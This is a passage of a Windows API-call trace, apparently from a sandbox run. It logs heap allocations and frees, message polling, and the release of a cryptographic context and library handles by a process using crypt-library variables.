wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0259.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0259.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0259.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0259.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0259.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0259.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0259.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0259.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0259.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0259.577] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0259.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.578] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0259.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0259.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0259.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0259.578] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0259.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0259.579] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0259.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517f0 [0259.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0259.580] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0259.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0259.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0259.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0259.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0259.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0259.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0259.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51610 [0259.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0259.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51688 [0259.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0259.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0259.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0259.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0259.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0259.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0259.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0259.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0259.581] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0259.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0259.581] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0259.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0259.581] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0259.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51658 [0259.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0259.581] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0259.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0259.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0259.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0259.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0259.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0259.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0259.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0259.582] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0259.582] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.582] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0259.582] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0259.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0259.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.583] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0259.583] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0259.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0259.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.583] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0259.583] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.584] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0259.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.584] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0259.584] FreeLibrary (hLibModule=0x756e0000) returned 1 [0259.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.584] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0259.584] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0259.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0259.584] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0259.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0259.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0259.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0259.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0259.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51610 [0259.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0259.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51658 [0259.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0259.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0259.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0259.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517f0 [0259.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0259.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0259.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.585] CloseHandle (hObject=0x2d0) returned 1 [0259.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0259.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0259.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0259.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0259.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0259.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0259.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0259.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0259.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0259.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0259.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0259.588] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0259.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0259.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0259.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0259.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0259.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0259.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51658 [0259.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0259.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0259.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0259.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0259.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0259.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517f0 [0259.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0259.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0259.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.589] CloseHandle (hObject=0x2a0) returned 1 [0259.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0259.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0259.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0259.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0259.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0259.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0259.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0259.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0259.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0259.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0259.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0259.593] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0259.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0259.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0259.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0259.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0259.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0259.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0259.593] HeapFree (in: hHeap=0x970000, 